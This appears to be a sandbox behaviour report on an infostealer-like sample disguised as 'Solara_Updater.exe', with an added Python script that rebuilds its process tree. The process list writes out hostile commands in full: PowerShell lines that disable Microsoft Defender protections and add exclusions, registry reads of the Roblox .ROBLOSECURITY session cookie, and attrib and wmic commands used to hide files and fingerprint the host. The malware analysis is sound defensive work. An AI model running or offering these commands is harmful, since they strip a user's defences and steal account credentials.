Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Default User\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara_Updater = "\"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara_Updater = "\"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" C:\hostNet\bridgeblockportComBroker.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created \??\c:\Windows\System32\CSC94C34EF13D4D4F8881CC8A1FBB80DA17.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\System32\t4pfwd.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Microsoft\5b8d2ee93f0f21 C:\hostNet\bridgeblockportComBroker.exe N/A
File created C:\Program Files (x86)\Microsoft\Solara_Updater.exe C:\hostNet\bridgeblockportComBroker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Solara_Updater.exe C:\hostNet\bridgeblockportComBroker.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\diagnostics\WmiPrvSE.exe C:\hostNet\bridgeblockportComBroker.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\sol.exe N/A (63 identical rows collapsed)
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\hostNet\bridgeblockportComBroker.exe N/A (1 row)

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A (4 identical rows collapsed)
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A (39 identical rows collapsed)
N/A N/A C:\hostNet\bridgeblockportComBroker.exe N/A (21 identical rows collapsed)

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4792 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 4792 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 4792 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2688 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2688 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2688 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 808 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 808 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 808 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 808 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 808 wrote to memory of 768 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 808 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 808 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 4796 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 4796 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 4796 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 4796 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 768 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 768 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 768 wrote to memory of 4220 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 2704 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\SYSTEM32\attrib.exe
PID 2704 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\SYSTEM32\attrib.exe
PID 2704 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 4304 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2496 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2496 wrote to memory of 1044 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 2496 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2496 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2496 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 2496 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2496 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 752 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 752 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 2704 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 220 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4640 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4640 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 4640 wrote to memory of 100 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 752 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 752 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2704 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 5012 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 1888 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 2840 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 1336 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 3216 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3948 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 3948 wrote to memory of 3928 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 3948 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 3948 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 3948 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 1044 wrote to memory of 4404 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
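The table above logs one row per WriteProcessMemory call, so each spawn appears two or three times and the parent/child structure is hard to read off the page. Below is an added example, mine and not part of the sandbox report, that parses a subset of these rows (copied verbatim and embedded as a constructed sample), collapses the repeats into counts, rebuilds the spawn tree, and lists every place a binary running from a Temp directory hands work to a signed Windows utility. The LOLBINS set is an assumption. One caveat: in this report every write pair coincides with process creation, which is the parent initialising the child it just started, so the output is a spawn tree and not evidence of injection into unrelated processes.

```python
import re
from dataclasses import dataclass, field

# One row per WriteProcessMemory call, as the sandbox prints it:
# "PID <parent> wrote to memory of <child> N/A <parent image> <child image>"
ROW_RE = re.compile(
    r"^PID (?P<ppid>\d+) wrote to memory of (?P<cpid>\d+) N/A (?P<pimg>\S+) (?P<cimg>\S+)$"
)

# Constructed sample: a subset of this report's rows, copied verbatim with the table
# header left in so the parser has to skip it. The repeated 4792 -> 2688 rows are real;
# the sandbox logs every write, so one spawn usually shows up two or three times.
SAMPLE_ROWS = r"""
Description Indicator Process Target
PID 4792 wrote to memory of 4796 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\sol.exe
PID 4792 wrote to memory of 808 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe
PID 2688 wrote to memory of 3584 N/A C:\Users\Admin\AppData\Local\Temp\sol.exe C:\Windows\SysWOW64\WScript.exe
PID 808 wrote to memory of 752 N/A C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe C:\Users\Admin\AppData\Local\Temp\Loader.exe
PID 4796 wrote to memory of 1336 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\XClient.exe
PID 4796 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\Loader.exe C:\Users\Admin\AppData\Local\Temp\RustCheat.exe
PID 2704 wrote to memory of 4424 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\Wbem\wmic.exe
PID 2704 wrote to memory of 944 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\SYSTEM32\attrib.exe
PID 2704 wrote to memory of 3136 N/A C:\Users\Admin\AppData\Local\Temp\RustCheat.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1336 wrote to memory of 2204 N/A C:\Users\Admin\AppData\Local\Temp\XClient.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"""

# Signed Windows utilities a dropper typically delegates to (assumed list).
LOLBINS = {"powershell.exe", "wmic.exe", "attrib.exe", "wscript.exe", "cmd.exe", "schtasks.exe"}


def basename(path):
    # os.path.basename does not split on '\' when this runs on a non-Windows host
    return path.rsplit("\\", 1)[-1]


@dataclass
class ProcessTree:
    image: dict = field(default_factory=dict)         # pid -> full image path
    parent: dict = field(default_factory=dict)        # child pid -> parent pid
    children: dict = field(default_factory=dict)      # parent pid -> child pids, first-seen order
    write_counts: dict = field(default_factory=dict)  # (parent, child) -> rows logged

    @property
    def roots(self):
        return [pid for pid in self.image if pid not in self.parent]

    def lineage(self, pid):
        """Image basenames from the root process down to pid."""
        chain = []
        while pid is not None:
            chain.append(basename(self.image[pid]))
            pid = self.parent.get(pid)
        return chain[::-1]

    def render(self, pid=None, depth=0):
        """Indented spawn tree; non-root nodes show how many writes the parent made."""
        if pid is None:
            return "\n".join(self.render(root) for root in self.roots)
        note = ""
        if pid in self.parent:
            note = f"  ({self.write_counts[(self.parent[pid], pid)]} write(s) from parent)"
        lines = ["  " * depth + f"{basename(self.image[pid])} [{pid}]{note}"]
        for child in self.children.get(pid, []):
            lines.append(self.render(child, depth + 1))
        return "\n".join(lines)


def parse_rows(text):
    """Fold the sandbox's repeated rows into one tree with per-edge write counts."""
    tree = ProcessTree()
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # table header or unrelated line
        ppid, cpid = int(m["ppid"]), int(m["cpid"])
        tree.image.setdefault(ppid, m["pimg"])
        tree.image.setdefault(cpid, m["cimg"])
        tree.parent.setdefault(cpid, ppid)
        kids = tree.children.setdefault(ppid, [])
        if cpid not in kids:
            kids.append(cpid)
        tree.write_counts[(ppid, cpid)] = tree.write_counts.get((ppid, cpid), 0) + 1
    return tree


def lolbins_spawned_from_temp(tree):
    """(parent name, child name, child pid) wherever a binary running out of a Temp
    directory hands work to a signed Windows utility."""
    hits = []
    for ppid, kids in tree.children.items():
        if "\\temp\\" not in tree.image[ppid].lower():
            continue
        for cpid in kids:
            if basename(tree.image[cpid]).lower() in LOLBINS:
                hits.append((basename(tree.image[ppid]), basename(tree.image[cpid]), cpid))
    return hits


if __name__ == "__main__":
    tree = parse_rows(SAMPLE_ROWS)
    print(tree.render())
    for parent, child, pid in lolbins_spawned_from_temp(tree):
        print(f"{parent} -> {child} [{pid}]: " + " > ".join(tree.lineage(pid)))
```

Run against the full table the same way: Solara_Updater.exe re-spawns itself (4792 -> 808 -> 2496 -> 3948) and each generation starts a fresh Loader.exe and sol.exe, so the repeated Loader/XClient/RustCheat rows further down are new instances, not the same processes being written to again.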

Uses Task Scheduler COM API

Tags: persistence

Views/modifies file attributes

Tags: evasion

Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A (7 identical rows collapsed)

Processes

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\RustCheat.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"

C:\Users\Admin\AppData\Local\Temp\RustCheat.exe

"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'

C:\Users\Admin\AppData\Local\Temp\Loader.exe

"C:\Users\Admin\AppData\Local\Temp\Loader.exe"

C:\Users\Admin\AppData\Local\Temp\sol.exe

"C:\Users\Admin\AppData\Local\Temp\sol.exe"

C:\Users\Admin\AppData\Local\Temp\XClient.exe

"C:\Users\Admin\AppData\Local\Temp\XClient.exe"

C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe

"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"

